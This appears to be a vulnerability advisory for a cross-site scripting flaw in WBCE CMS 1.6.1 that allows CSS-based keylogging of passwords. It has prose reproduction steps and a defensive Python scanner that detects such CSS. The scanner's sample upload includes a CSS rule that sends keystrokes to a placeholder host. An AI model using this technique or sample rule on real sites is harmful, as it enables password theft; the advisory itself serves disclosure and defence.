WBCE CMS Cross-Site Scripting Vulnerability Allowing Keylogging

Vulnerability

A cross-site scripting vulnerability has been identified in WBCE CMS version 1.6.1. This issue allows attackers to inject malicious HTML and CSS, enabling the capture of user keystrokes. By uploading a crafted HTML file that utilizes CSS-based keylogging techniques, attackers can intercept password characters through background image requests.

Impact

Exploitation of this vulnerability allows for cross-site scripting, with the added consequence of keylogging, specifically targeting password inputs.

Reproduction

To reproduce this vulnerability, upload an HTML file containing keylogging CSS styles into the media section of WBCE CMS 1.6.1. After uploading, access the file to activate the keylogging script. Once the keylogger is active, log out and return to the login page. The keylogger will send captured keystrokes to the attacker's server.
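A defender can screen files in the media directory for the pattern described above: a CSS rule whose selector tests an input's `value` attribute and whose declarations fetch a remote `url()`. The following scanner is an added example, not code from WBCE CMS or from the original advisory; the function names, the sample upload and the `collector.example` host are constructed for illustration.

```python
import re

# One CSS rule: selector text followed by a brace-delimited declaration block.
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}")
# Attribute selector that tests the content of a value attribute (=, ^=, $=, *=, ~=, |=).
VALUE_ATTR_RE = re.compile(r"\[\s*value\s*(?:[\^$*~|]?=)", re.IGNORECASE)
# url(...) reference inside a declaration block.
URL_RE = re.compile(r"url\(\s*['\"]?([^'\")\s]+)", re.IGNORECASE)
STYLE_RE = re.compile(r"<style\b[^>]*>(.*?)</style\s*>", re.IGNORECASE | re.DOTALL)
COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)


def is_remote(url):
    """True for absolute or protocol-relative URLs, i.e. requests that leave the site."""
    return bool(re.match(r"(?:[a-z][a-z0-9+.-]*:)?//", url, re.IGNORECASE))


def find_value_exfil_rules(text):
    """Return (selector, url) pairs for rules that combine a [value...] selector
    with a remote url() fetch, the building block of CSS-based keylogging."""
    blocks = STYLE_RE.findall(text) or [text]  # no <style> tag: treat as a bare .css file
    findings = []
    for css in blocks:
        css = COMMENT_RE.sub("", css)
        for selector, body in RULE_RE.findall(css):
            if not VALUE_ATTR_RE.search(selector):
                continue
            for url in URL_RE.findall(body):
                if is_remote(url):
                    findings.append((" ".join(selector.split()), url))
    return findings


# Constructed sample upload (not taken from the advisory); the host is a placeholder.
SAMPLE_UPLOAD = """<html><head><style>
body { background: url(/media/bg.png); }
input[type="password"][value$="a"] { background-image: url("https://collector.example/k?c=a"); }
</style></head><body></body></html>"""

if __name__ == "__main__":
    for selector, url in find_value_exfil_rules(SAMPLE_UPLOAD):
        print(f"suspicious rule: {selector} -> {url}")
```

Rules that only load same-site images, or that use `[value]` without a comparison, are not reported, which keeps ordinary form styling out of the findings.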

Added: Dec 16, 2025, 5:53 PM
Updated: Dec 16, 2025, 7:25 PM

Vulnerability Rating

Custom Algorithm
spread: 1.0
impact: 1.7
exploitability: 6.5
remediation: 0.0
relevance: 1.5
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.